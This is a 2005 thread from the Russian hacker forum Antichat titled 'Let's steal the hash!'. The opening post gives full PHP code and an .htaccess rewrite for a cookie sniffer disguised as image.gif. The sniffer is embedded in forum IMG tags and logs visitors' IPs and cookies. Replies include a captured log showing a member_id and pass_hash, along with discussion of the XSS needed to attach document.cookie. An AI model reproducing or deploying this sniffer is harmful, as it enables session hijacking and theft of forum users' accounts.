ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Программирование > PHP, PERL, MySQL, JavaScript
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

Воруем хэш!
  #1  
Старый 29.10.2005, 22:39
Аватар для degeneration x
degeneration x
Познающий
Регистрация: 11.10.2005
Сообщений: 97
Провел на форуме:
732018

Репутация: 117
По умолчанию Воруем хэш!

Подходит для всех форумов.

1. Регимся на jino-net.ru
2. Загружаем туда файлы :
image.gif
sniff.php
.htaccess
log.txt


Image.gif - любое изображение.
Sniff.php должен быть след. содержания:

PHP код:
<?  $log="log.txt";  $file fopen ($log"a+");  $qu=UrlDecode(getenv('QUERY_STRING'));  $ref=UrlDecode(getenv('HTTP_REFERER'));  $ip=getenv('REMOTE_ADDR');  $brow=getenv('HTTP_USER_AGENT');  $upc=getenv('REMOTE_HOST');  $cookie=getenv('HTTP_COOKIE');  $now getdate();   $nowstring=$now['mday'].".".$now['mon'].".".$now['year']." ".$now['hours'].":".$now['minutes'].":".$now['seconds'];  $str="[$nowstring] IP=$ip Cookie=$cookie Browser=$brow REFERER=$ref QUERY=$qu\n";  fputs ($file$str);  fclose($file);  header('Location: image.gif');  ?>
.htaccess такого содержания:
Код:
RewriteEngine On
RewriteRule image.gif sniff.php
Далее пишем на форуме:
в тэге IMG пишем линк к image.gif

На log.txt ставин chmod 777 и всё!
Куки у нас!
 
Ответить с цитированием

  #2  
Старый 29.10.2005, 23:15
Аватар для w4rd3n
w4rd3n
Banned
Регистрация: 06.10.2005
Сообщений: 180
Провел на форуме:
244618

Репутация: -4
По умолчанию

оффтоп очень удобное окошко с php кодом...
 
Ответить с цитированием

  #3  
Старый 29.10.2005, 23:29
Аватар для *Van*
*Van*
Постоянный
Регистрация: 14.08.2005
Сообщений: 378
Провел на форуме:
670862

Репутация: 54
Отправить сообщение для *Van* с помощью ICQ
По умолчанию

<На log.txt ставин chmod 777 и всё!

Что это значит и как это делать?
 
Ответить с цитированием

  #4  
Старый 29.10.2005, 23:37
Аватар для ZaCo
ZaCo
Banned
Регистрация: 20.06.2005
Сообщений: 880
Провел на форуме:
4610226

Репутация: 1332


По умолчанию

Да ты просто гений! ))))
Правда это работает так же как и снифак на ачате... но эт неважно!
А сказать прикол? кроме реферера ничего к тебе не придёт! там должна быть хсс что сразу отметает из 100% 90% =))))
 
Ответить с цитированием

  #5  
Старый 29.10.2005, 23:39
Аватар для ZaCo
ZaCo
Banned
Регистрация: 20.06.2005
Сообщений: 880
Провел на форуме:
4610226

Репутация: 1332


По умолчанию

2Ван никсовая команда chmod... тут он меняет права доступа к файлу
 
Ответить с цитированием

  #6  
Старый 29.10.2005, 23:51
Аватар для degeneration x
degeneration x
Познающий
Регистрация: 11.10.2005
Сообщений: 97
Провел на форуме:
732018

Репутация: 117
По умолчанию

Цитата:
Сообщение от ZaCo  
Да ты просто гений! ))))
А сказать прикол? кроме реферера ничего к тебе не придёт!
Да ладно? Ко мне уже приходили куки с форума ipb 2.0.4
 
Ответить с цитированием

  #7  
Старый 29.10.2005, 23:58
Аватар для degeneration x
degeneration x
Познающий
Регистрация: 11.10.2005
Сообщений: 97
Провел на форуме:
732018

Репутация: 117
По умолчанию

Вот что пришло:
Код:
[29.10.2005 23:54:16] IP=xxxxxxx Cookie=bbmode=0; anonlogin=-1; member_id=2; pass_hash=65ab52b200fdcc7f2c80d60bb1cc9bff; forum_read=a%3A1%3A%7Bi%3A2%3Bi%3A1130599467%3B%7D Browser=Opera/8.50 (Windows NT 5.1; U; ru) REFERER=http://xxxxxxxxxxxxxxxx QUERY=
 
Ответить с цитированием

  #8  
Старый 29.10.2005, 23:58
Аватар для ZaCo
ZaCo
Banned
Регистрация: 20.06.2005
Сообщений: 880
Провел на форуме:
4610226

Репутация: 1332


По умолчанию

2degeneration x: хз. там понимаешь штука со снифаком какая - когда ты его запихиваешь например в <IMG> тебе необходимо(для получения куксов) прикреплять ещё и document.cookie это можно сделать только с помощью хсс! Ну сам подумай так бы все сайты ломались
 
Ответить с цитированием

  #9  
Старый 30.10.2005, 16:21
Аватар для tester
tester
Новичок
Регистрация: 18.07.2005
Сообщений: 10
Провел на форуме:
32107

Репутация: 0
По умолчанию

на phpbb это не работает

Последний раз редактировалось tester; 30.10.2005 в 16:32..
 
Ответить с цитированием

  #10  
Старый 30.10.2005, 16:23
Аватар для w4rd3n
w4rd3n
Banned
Регистрация: 06.10.2005
Сообщений: 180
Провел на форуме:
244618

Репутация: -4
По умолчанию

Для phpbb эксплойтов просто завались...
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ